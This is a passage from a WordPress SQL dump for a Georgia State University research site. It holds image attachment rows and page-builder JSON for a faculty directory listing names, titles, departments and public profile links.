14:50:33','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Alex-e1697208598736.jpg',0,'attachment','image/jpeg',0),(1783,1,'2023-10-13 10:50:58','2023-10-13 14:50:58','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg','cropped-cropped-Bhavya-scaled-1.jpg','','inherit','open','closed','','cropped-cropped-bhavya-scaled-1-jpg','','','2023-10-13 10:51:22','2023-10-13 14:51:22','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Bhavya-scaled-1.jpg',0,'attachment','image/jpeg',0),(1784,1,'2023-10-13 10:51:24','2023-10-13 14:51:24','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg','cropped-cropped-Bhavya-scaled-1.jpg','','inherit','open','closed','','cropped-cropped-bhavya-scaled-1-jpg-2','','','2023-10-13 10:51:24','2023-10-13 14:51:24','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg',0,'attachment','image/jpeg',0),(1785,1,'2023-10-13 10:51:51','2023-10-13 14:51:51','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg','cropped-cropped-Vineeth.jpg','','inherit','open','closed','','cropped-cropped-vineeth-jpg','','','2023-10-13 10:52:10','2023-10-13 14:52:10','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Vineeth.jpg',0,'attachment','image/jpeg',0),(1786,1,'2023-10-13 10:52:13','2023-10-13 14:52:13','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg','cropped-cropped-Vineeth.jpg','','inherit','open','closed','','cropped-cropped-vineeth-jpg-2','','','2023-10-13 10:52:13','2023-10-13 14:52:13','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Vineeth-e1697208720256.jpg',0,'attachment','image/jpeg',0),(1787,1,'2023-10-13 10:52:35','2023-10-13 14:52:35','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg','cropped-cropped-sathwik-2-scaled-1.jpg','','inherit','open','closed','','cropped-cropped-sathwik-2-scaled-1-jpg','','','2023-10-13 10:54:07','2023-10-13 14:54:07','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-sathwik-2-scaled-1.jpg',0,'attachment','image/jpeg',0),(1788,1,'2023-10-13 10:54:09','2023-10-13 14:54:09','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg','cropped-cropped-sathwik-2-scaled-1.jpg','','inherit','open','closed','','cropped-cropped-sathwik-2-scaled-1-jpg-2','','','2023-10-13 10:54:09','2023-10-13 14:54:09','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg',0,'attachment','image/jpeg',0),(1789,1,'2023-10-13 10:55:20','2023-10-13 14:55:20','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal.jpeg','cropped-cropped-Brindal.jpeg','','inherit','open','closed','','cropped-cropped-brindal-jpeg','','','2023-10-13 10:56:16','2023-10-13 14:56:16','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Brindal.jpeg',0,'attachment','image/jpeg',0),(1790,1,'2023-10-13 10:56:22','2023-10-13 14:56:22','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal.jpeg','cropped-cropped-Brindal.jpeg','','inherit','open','closed','','cropped-cropped-brindal-jpeg-2','','','2023-10-13 10:56:22','2023-10-13 14:56:22','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Brindal-e1697208968672.jpeg',0,'attachment','image/jpeg',0),(1791,1,'2023-10-13 10:58:05','2023-10-13 14:58:05','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg','cropped-cropped-ruby_parcells-scaled-1-2.jpg','','inherit','open','closed','','cropped-cropped-ruby_parcells-scaled-1-2-jpg','','','2023-10-13 10:58:53','2023-10-13 14:58:53','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-ruby_parcells-scaled-1-2.jpg',0,'attachment','image/jpeg',0),(1792,1,'2023-10-13 10:58:55','2023-10-13 14:58:55','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg','cropped-cropped-ruby_parcells-scaled-1-2.jpg','','inherit','open','closed','','cropped-cropped-ruby_parcells-scaled-1-2-jpg-2','','','2023-10-13 10:58:55','2023-10-13 14:58:55','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg',0,'attachment','image/jpeg',0),(1793,1,'2023-10-13 10:59:16','2023-10-13 14:59:16','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg','cropped-cropped-Reshmanjali-1.jpeg','','inherit','open','closed','','cropped-cropped-reshmanjali-1-jpeg','','','2023-10-13 10:59:49','2023-10-13 14:59:49','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Reshmanjali-1.jpeg',0,'attachment','image/jpeg',0),(1794,1,'2023-10-13 10:59:52','2023-10-13 14:59:52','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg','cropped-cropped-Reshmanjali-1.jpeg','','inherit','open','closed','','cropped-cropped-reshmanjali-1-jpeg-2','','','2023-10-13 10:59:52','2023-10-13 14:59:52','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg',0,'attachment','image/jpeg',0),(1795,1,'2023-10-13 11:00:12','2023-10-13 15:00:12','https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-Eliza-Schuh.jpg','cropped-Eliza-Schuh.jpg','','inherit','open','closed','','cropped-eliza-schuh-jpg','','','2023-10-13 11:00:12','2023-10-13 15:00:12','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg',0,'attachment','image/jpeg',0),(1796,1,'2023-10-13 11:00:40','2023-10-13 15:00:40','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png','cropped-cropped-Bronson.png','','inherit','open','closed','','cropped-cropped-bronson-png','','','2023-10-13 11:02:46','2023-10-13 15:02:46','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Bronson.png',0,'attachment','image/png',0),(1797,1,'2023-10-13 11:02:49','2023-10-13 15:02:49','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png','cropped-cropped-Bronson.png','','inherit','open','closed','','cropped-cropped-bronson-png-2','','','2023-10-13 11:02:49','2023-10-13 15:02:49','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bronson-e1697209357897.png',0,'attachment','image/png',0),(1798,1,'2023-10-13 11:02:56','2023-10-13 15:02:56','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1697,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-Portrait-1-e1697202215204.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1701,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\",\"caption\":{\"text\":\"\"},\"imageId\":1704,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c58\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c59\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/Hassan-Babaie-300x300-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1634,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c60\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":2,\"id\":\"182-c61\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c62\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c63\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",